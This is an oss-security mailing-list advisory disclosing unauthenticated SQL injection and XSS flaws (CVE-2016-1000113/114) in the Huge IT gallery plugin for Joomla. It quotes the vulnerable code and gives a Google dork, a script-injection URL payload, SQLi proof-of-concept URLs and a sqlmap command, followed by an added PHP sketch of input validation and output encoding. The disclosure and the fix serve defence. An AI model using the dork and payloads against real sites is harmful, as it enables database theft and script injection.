Date: Thu, 01 Sep 2016 08:22:11 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Updated: XSS and SQLi in huge IT gallery v1.1.5 for Joomla

I thought I should share this here. This vulnerability doesn't require authentication to exploit; it has been fixed in v1.1.6, not v1.1.7.


Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Author: Larry W. Cashdollar, @_larry0; Elitza Neytcheva, @E1337za
Date: 2016-07-14
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed v1.1.6
Vendor Contact: info@...e-it.com
Advisory: http://www.vapidlabs.com/advisory.php?v=164
Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.
Vulnerability:
The attacker does not need to be logged in to Joomla to exploit this vulnerability:

SQLi in code via id parameter:
./administrator/components/com_gallery/models/gallery.php
    public function getPropertie() {
        $db = JFactory::getDBO();
        // 'id' is read from the request without any type filter
        $id_cat = JRequest::getVar('id');
        $query = $db->getQuery(true);
        $query->select('#__huge_itgallery_images.name as name,'
                . '#__huge_itgallery_images.id ,'
                . '#__huge_itgallery_gallerys.name as portName,'
                . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itgallery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
        $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itgallery_images'));
        // $id_cat is concatenated into the WHERE clause unquoted and uncast
        $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
        $query->order('ordering desc');

        $db->setQuery($query);
        $results = $db->loadObjectList();
        return $results;
    }

XSS is here:

root@...mla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \;
./administrator/components/com_gallery/views/gallery/tmpl/default.php
root@...mla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \;
256:                    <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" >

CVE-2016-1000113 SQLi
CVE-2016-1000114 XSS
Google Dork:
inurl:option=com_gallery inurl:id

Exploit Code:
XSS PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
 
SQLi PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE

http://192.168.0.125/index.php?option=com_gallery&id=HERE
 
$ sqlmap -u "http://192.168.0.125/index.php?option=com_gallery&id=*" --dbms mysql
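
Added example (not part of the original advisory, and not the vendor's v1.1.6 patch): a stand-alone PHP sketch of the two checks missing from the code quoted above, strict integer validation of id before it reaches the WHERE clause, and HTML-attribute encoding of the value echoed into the href. The function names are hypothetical and the sample inputs are constructed; the second sample is the id value from the XSS PoC URL above, URL-decoded.

```php
<?php
// Added example: plain PHP with no Joomla dependency. All function names are hypothetical.
// Inside the component, the usual equivalents are JRequest::getInt('id') at the source
// and an (int) cast where the value is concatenated into the query.

/** Return id as a positive integer, or null if the request value is not a valid one. */
function gallery_id_from_request(array $get): ?int
{
    $raw = $get['id'] ?? null;
    if (!is_string($raw)) {
        return null;                      // missing, or an array such as id[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** WHERE fragment for the query in getPropertie(): built from an int, never from request text. */
function gallery_where_clause(int $id): string
{
    return 'gallery_id = ' . $id;
}

/** href for the modal link in default.php: URL-encode the parameters, then HTML-encode the attribute. */
function video_modal_href(int $id): string
{
    $url = 'index.php?' . http_build_query([
        'option' => 'com_gallery',
        'view'   => 'video',
        'tmpl'   => 'component',
        'pid'    => $id,
    ], '', '&');
    return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
}

// Constructed inputs: a normal id, the decoded id value from the XSS PoC, and two edge cases.
$samples = ['1', '1-- "><script>alert(1);</script>', '0', ''];
foreach ($samples as $raw) {
    $id = gallery_id_from_request(['id' => $raw]);
    if ($id === null) {
        // Reject before any query is built or any markup is emitted.
        printf("%-40s => rejected\n", var_export($raw, true));
        continue;
    }
    printf("%-40s => %s | href=\"%s\"\n", var_export($raw, true),
        gallery_where_clause($id), video_modal_href($id));
}
```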
